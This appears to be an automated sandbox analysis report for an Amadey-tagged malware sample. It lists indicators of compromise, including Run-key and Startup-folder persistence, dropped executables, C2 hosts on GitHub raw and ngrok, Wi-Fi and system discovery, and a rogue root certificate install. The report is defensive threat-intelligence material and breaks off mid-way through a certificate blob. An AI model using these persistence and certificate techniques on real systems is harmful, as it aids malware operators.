amadey | e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1

pid	Process
7516	chrome.exe
7604	chrome.exe
6452	chrome.exe
7328	chrome.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/1348-918-0x00000000050D0000-0x0000000005140000-memory.dmp	net_reactor
behavioral1/memory/1348-922-0x0000000005140000-0x00000000051AE000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	freedom.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	PctOccurred.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	freedom.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	freedom.exe

Executes dropped EXE 21 IoCs

pid	Process
5808	4363463463464363463463463.exe
5312	freedom.exe
4736	4363463463464363463463463.exe
5140	dos.exe
4980	ZZZ.exe
3292	4363463463464363463463463.exe
5496	4363463463464363463463463.exe
880	PrintSpoofer.exe
2892	robotic.exe
5692	PctOccurred.exe
6116	Server.exe
5412	Windows.exe
1332	Restructuring.pif
5752	RambledMime.exe
2300	GoogleUpdate.exe
5788	loader.exe
4836	5_6190317556063017550.exe
3944	Security.exe
5532	AZBUHHS4ZXAOVL7SV2TK8.exe
4828	25072023.exe
3336	surfex.exe

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x00070000000249d7-10319.dat	themida

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\Windows.exe"	freedom.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\Desktop\\Files\\Server.exe\" .."	Server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\Desktop\\Files\\Server.exe\" .."	Server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	loader.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs

Web Service

T1102

flow	ioc
820	raw.githubusercontent.com
890	raw.githubusercontent.com
1185	2.tcp.ngrok.io
198	raw.githubusercontent.com
225	raw.githubusercontent.com
256	raw.githubusercontent.com
547	raw.githubusercontent.com
728	raw.githubusercontent.com
732	raw.githubusercontent.com
199	raw.githubusercontent.com
242	raw.githubusercontent.com
409	raw.githubusercontent.com
656	2.tcp.ngrok.io

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
190	ip-api.com
247	ip-api.com
538	ip-api.com
1093	api.ipify.org
1096	api.ipify.org

Power Settings 1 TTPs 4 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
9412	powercfg.exe
6260	powercfg.exe
2240	powercfg.exe
6440	powercfg.exe

Enumerates processes with tasklist 1 TTPs 26 IoCs

Process Discovery

T1057

pid	Process
9112	tasklist.exe
7876	tasklist.exe
11224	tasklist.exe
10288	tasklist.exe
2328	tasklist.exe
6788	tasklist.exe
5828	tasklist.exe
9552	tasklist.exe
10516	tasklist.exe
908	Process not Found
3124	tasklist.exe
5324	tasklist.exe
11084	Process not Found
2240	Process not Found
6716	tasklist.exe
7456	tasklist.exe
10088	tasklist.exe
10484	Process not Found
7812	tasklist.exe
9776	tasklist.exe
5476	Process not Found
5148	Process not Found
220	tasklist.exe
8436	tasklist.exe
9184	tasklist.exe
6920	tasklist.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 5752 set thread context of 5876	5752	RambledMime.exe	415
PID 2300 set thread context of 1620	2300	GoogleUpdate.exe	760

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/7288-1619-0x0000000000400000-0x0000000000516000-memory.dmp	upx
behavioral1/memory/7288-3496-0x0000000000400000-0x0000000000516000-memory.dmp	upx
behavioral1/files/0x0007000000024a6a-12519.dat	upx

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\Application\AZBUHHS4ZXAOVL7SV2TK8.exe	RegAsm.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
10652	sc.exe
440	sc.exe
2788	sc.exe
7860	sc.exe
228	sc.exe
2716	sc.exe
4912	sc.exe
3500	sc.exe
8060	sc.exe
9092	sc.exe
5364	sc.exe
8744	sc.exe
6756	sc.exe
1812	sc.exe
9840	sc.exe

Detects Pyinstaller 4 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0003000000022eb3-1006.dat	pyinstaller
behavioral1/files/0x0008000000024218-5358.dat	pyinstaller
behavioral1/files/0x000a00000002497b-11620.dat	pyinstaller
behavioral1/files/0x00090000000249f9-15230.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 8 IoCs

pid	pid_target	Process	procid_target
764	4980	WerFault.exe	134
2716	7792	WerFault.exe	771
6284	7480	WerFault.exe	758
8296	11160	WerFault.exe	1252
8792	6640	WerFault.exe	1200
11180	5360	WerFault.exe	823
7644	5852	WerFault.exe	1546
7104	8848	WerFault.exe	1625

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ZZZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RambledMime.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	25072023.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GoogleUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PctOccurred.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Restructuring.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	surfex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AZBUHHS4ZXAOVL7SV2TK8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5_6190317556063017550.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

Adversaries may check for Internet connectivity on compromised systems.

Internet Connection Discovery

T1016.001

pid	Process
10668	svchost.com
1412	cmd.exe
9152	PING.EXE
8036	cmd.exe
8016	cmd.exe
8248	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

Wi-Fi Discovery

T1016.002

pid	Process
6844	cmd.exe
6976	netsh.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	dos.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dos.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6864	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dos.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	dos.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
6232	taskkill.exe
2328	taskkill.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "4"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f42665c8d01334507439b53224de2ed1fe6260001002600efbe110000003b08aa419818db01e99ad1ee9918db01e99ad1ee9918db0114000000	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	firefox.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

pid	Process
8112	reg.exe
1040	reg.exe
10592	reg.exe
10104	Process not Found

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	25072023.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01